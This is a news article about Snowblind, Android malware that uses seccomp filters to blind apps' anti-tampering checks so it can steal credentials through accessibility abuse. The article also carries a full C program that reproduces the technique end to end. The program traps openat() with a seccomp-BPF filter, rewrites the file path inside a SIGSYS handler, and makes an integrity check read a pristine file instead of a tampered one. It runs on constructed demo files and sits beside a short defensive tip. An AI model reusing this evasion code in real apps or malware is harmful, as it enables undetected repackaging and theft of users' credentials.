Snowblind, a newly documented piece of Android malware, abuses a security feature of the Linux kernel to bypass the anti-tampering protections built into apps that handle sensitive user data.
Snowblind repackages a target app so that it can no longer detect the abuse of accessibility services, which the malware uses to capture user input such as credentials or to gain remote control of the device and perform malicious actions.
Unlike other Android malware, Snowblind abuses seccomp (short for secure computing), a Linux kernel feature that Android uses to sandbox app processes by restricting the system calls they can make, and turns it against the integrity checks that are meant to protect users from application repackaging.
Mobile app security company Promon was able to analyze how Snowblind achieves its goal undetected after receiving a sample from i-Sprint, a partner providing access and identity system protections to businesses.
Seccomp is a Linux kernel security feature designed to reduce the attack surface of applications by restricting the system calls they can make.
It acts as a filter on the system calls a process is allowed to make: calls that are not on the filter's allow list, typically ones that have been abused in attacks, are blocked before the kernel executes them.
Google first integrated seccomp into Android 8, installing the filter in the Zygote process, from which every Android app process is forked, so every app inherits it.
Snowblind targets apps that handle sensitive data by injecting a native library that loads before the app's anti-tampering code and installs a seccomp filter to intercept system calls such as open(), the call that file access comes down to.
When the anti-tampering code opens the app's APK to check it for modification, Snowblind's filter does not let the call proceed; instead it makes the kernel deliver a SIGSYS signal (the signal normally raised for a bad system call) to the process, where the malware's own signal handler is waiting.
Inside that handler the malware rewrites the arguments of the trapped open() call so that the anti-tampering code reads an unmodified copy of the APK instead of the repackaged one, and then lets the call complete. Because the filter matches only the few calls it needs, the performance impact and operational footprint are minimal, so the user is unlikely to notice anything during normal app operation.
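The paragraphs above describe the mechanism in prose; the following C program is an added example written for this page to show it running end to end. It is not Snowblind's code and not Promon's analysis tooling. It installs a seccomp-BPF filter that returns SECCOMP_RET_TRAP for openat(AT_FDCWD, ...), catches the resulting SIGSYS, rewrites the path argument in the saved registers, and re-issues the call, so a stand-in "integrity check" that opens a constructed file named tampered.apk silently reads a constructed pristine.apk instead. Assumptions: x86_64 or arm64 Linux (the register layout is written for those two ABIs); the two files are constructed in a temporary directory; and the trick of re-issuing the call with a dirfd other than AT_FDCWD so that it passes the filter is this example's own design choice, since the article does not say how Snowblind lets the real open proceed. The check calls openat() directly because bionic's and glibc's open() are implemented as openat(AT_FDCWD, ...) underneath.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <signal.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <ucontext.h>
#include <unistd.h>

static int g_dirfd = -1;       /* directory fd opened before the filter goes in */
static char g_pristine[256];   /* constructed path substituted for ".../tampered.apk" */

/* SIGSYS handler: runs instead of each openat(AT_FDCWD, ...) the filter traps. Reads the call's
 * argument registers from the ucontext, swaps the path if it is the file under attack, re-issues
 * the call and writes the result into the return register, so the caller sees a normal result. */
static void sigsys_handler(int sig, siginfo_t *si, void *ctx)
{
    (void)sig; (void)si;
    int saved_errno = errno;
    ucontext_t *uc = ctx;
#if defined(__x86_64__)
    greg_t *g = uc->uc_mcontext.gregs;             /* openat args live in rdi, rsi, rdx, r10 */
    const char *path = (const char *)g[REG_RSI];
    long flags = g[REG_RDX], mode = g[REG_R10];
#elif defined(__aarch64__)
    unsigned long long *r = uc->uc_mcontext.regs;  /* openat args live in x0..x3 */
    const char *path = (const char *)r[1];
    long flags = (long)r[2], mode = (long)r[3];
#else
#error "register layout written for x86_64 and aarch64 only"
#endif
    if (path && strstr(path, "/tampered.apk"))
        path = g_pristine;                         /* the redirection itself */
    /* Re-issue with a real dirfd: the filter traps only dirfd == AT_FDCWD, so this call passes.
     * dirfd is ignored for absolute paths; relative ones resolve against the cwd captured at
     * install time, a limitation of this demo rather than of the technique. */
    long ret = syscall(SYS_openat, g_dirfd, path, flags, mode);
    if (ret < 0) ret = -errno;                     /* kernel convention: -errno in the return register */
#if defined(__x86_64__)
    g[REG_RAX] = ret;
#else
    r[0] = (unsigned long long)ret;
#endif
    errno = saved_errno;
}

/* Install the handler, then a seccomp-BPF filter that traps openat(AT_FDCWD, ...) and allows
 * everything else. A production filter would also check seccomp_data.arch. */
static int install_open_trap(void)
{
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_sigaction = sigsys_handler;
    sa.sa_flags = SA_SIGINFO;
    if (sigaction(SIGSYS, &sa, NULL) != 0) return -1;
    if ((g_dirfd = open(".", O_RDONLY | O_DIRECTORY)) < 0) return -1;
    struct sock_filter filt[] = {
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, (unsigned)SYS_openat, 0, 3),        /* not openat: allow */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, args)), /* low 32 bits of dirfd */
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, (unsigned)AT_FDCWD, 0, 1),          /* other dirfd: allow */
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_TRAP),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = { .len = (unsigned short)(sizeof filt / sizeof filt[0]), .filter = filt };
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0) return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
}

static int put_file(const char *p, const char *d)
{
    int fd = open(p, O_WRONLY | O_CREAT | O_TRUNC, 0600), n = fd < 0 ? -1 : (int)write(fd, d, strlen(d));
    if (fd >= 0) close(fd);
    return n == (int)strlen(d) ? 0 : -1;
}

/* Stand-in for the anti-tampering check (a real one hashes the APK); openat() is what open() becomes. */
static int read_marker(const char *path, char *out, size_t n)
{
    int fd = openat(AT_FDCWD, path, O_RDONLY), got = fd < 0 ? -1 : (int)read(fd, out, n);
    if (fd >= 0) close(fd);
    return got;
}

/* Two constructed files stand in for the repackaged and the pristine APK. Returns 1 if, once the
 * trap is in, the check read "PRISTINE" through the tampered path; 0 if not; -1 on setup failure. */
int run_snowblind_style_demo(void)
{
    char dir[] = "/tmp/snowblind-demo-XXXXXX", tampered[256], before[9] = {0}, after[9] = {0};
    if (!mkdtemp(dir)) return -1;
    snprintf(tampered, sizeof tampered, "%s/tampered.apk", dir);
    snprintf(g_pristine, sizeof g_pristine, "%s/pristine.apk", dir);
    if (put_file(tampered, "TAMPERED") || put_file(g_pristine, "PRISTINE")) return -1;
    if (read_marker(tampered, before, 8) != 8) return -1;   /* unfiltered: reads TAMPERED */
    if (install_open_trap() != 0) return -1;
    int n = read_marker(tampered, after, 8);                /* trapped: handler redirects */
    unlink(tampered); unlink(g_pristine); rmdir(dir);
    return n == 8 && strcmp(before, "TAMPERED") == 0 && strcmp(after, "PRISTINE") == 0;
}

int main(void) { return run_snowblind_style_demo() == 1 ? 0 : 1; }  /* exit 0: the check was fooled */
```

Two points worth noting for anyone building the defensive side. A seccomp filter cannot be removed once installed, so the process keeps the trap for its lifetime; that is also why the malware's library has to load before the anti-tampering code, which is the only window in which the check could have run unfiltered. And simply checking whether a filter is present tells an app nothing on Android 8 and later, because Zygote already installed one before the app's code ran; kernels from 5.9 onward do expose the number of stacked filters as the Seccomp_filters line in /proc/self/status, which an integrity check could compare against the count it expects from Zygote alone.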
In a video demonstrating how the attack works, the researchers show that a Snowblind attack is completely invisible to the user and can result in leaking login credentials.
The researchers told BleepingComputer that Snowblind can be used to disable various security features in apps, such as two-factor authentication or biometric verification.
Promon says that Snowblind was observed targeting one app of an i-Sprint customer in Southeast Asia.
It is unclear how many apps have been targeted so far.
The method could be adopted by other adversaries to bypass protections in Android.
Google's statement on the matter: "Based on our current detection, no apps containing this malware are found on Google Play. Android users are automatically protected against known versions of this malware by Google Play Protect, which is on by default on Android devices with Google Play Services."
This Cyber News was published on www.bleepingcomputer.com. Publication date: Wed, 26 Jun 2024 19:10:19 +0000